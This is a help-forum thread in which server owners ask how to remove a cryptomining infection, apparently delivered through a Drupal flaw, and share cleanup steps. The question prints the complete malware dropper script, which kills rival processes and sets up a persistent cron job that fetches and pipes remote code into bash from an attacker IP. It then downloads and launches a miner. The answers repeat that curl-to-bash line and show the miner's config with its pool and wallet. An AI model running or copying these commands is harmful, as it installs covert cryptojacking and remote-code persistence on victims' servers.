# suppoie malware removal (script hidden in .jpg)

Tags: 16.04, malware

Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?

```
curl -s http://158.69.133.18:8220/logo7.jpg
```

```sh
#!/bin/sh
ps aux | grep -vw suppoie | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w suppoie |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
chmod 777 /var/tmp/suppoie
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
```

Comment: Its done and system seems clean. I think its related to Drupas security issues.

Comment: The only true way to clean your system in a sure-fire way is to **nuke it from orbit** and start 'fresh' from *known clean* backups.

Answer (score 2):

It is in your www-data cron:

```
    sudo crontab -e -u www-data
```

You'll see something like:

```
    * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
```

Kill the process then clear it out of /var/tmp

Answer (score 2):

I guess this is a bitcoin mining malware, someone found out the drupal's security breach and put this script on my server as well.

In my case, it is in /var/spool/cron/crontabs/, also curl something like

```
    * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
```

and the script is in /var/tmp/config.json and suppoie,
which looks like this

```
{
"algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
"av": 0,                // algorithm variation, 0 auto select
"background": true,    // true to run the miner in the background
"colors": true,         // false to disable colored output    
"cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null,   // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1,      // donate level, mininum 1%
"log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.  
"print-time": 60,       // print hashrate report every N seconds
"retries": 5,           // number of times to retry before switch to backup server
"retry-pause": 5,       // time to pause between retries
"safe": false,          // true to safe adjust threads and av settings for current CPU
"threads": null,        // number of miner threads
"pools": [
    {
        "url": "stratum+tcp://monerohash.com:5555",   // URL of mining server
        "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo",                        // username for mining server
        "pass": "x",                       // password for mining server
        "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
        "nicehash": false                  // enable nicehash/xmrig-proxy support
    }
],
"api": {
    "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
    "access-token": null,                  // access token for API
    "worker-id": null                      // custom worker-id for API
}
```

Deleted the line in crontabs, and cleared /var/tmp/, seems worked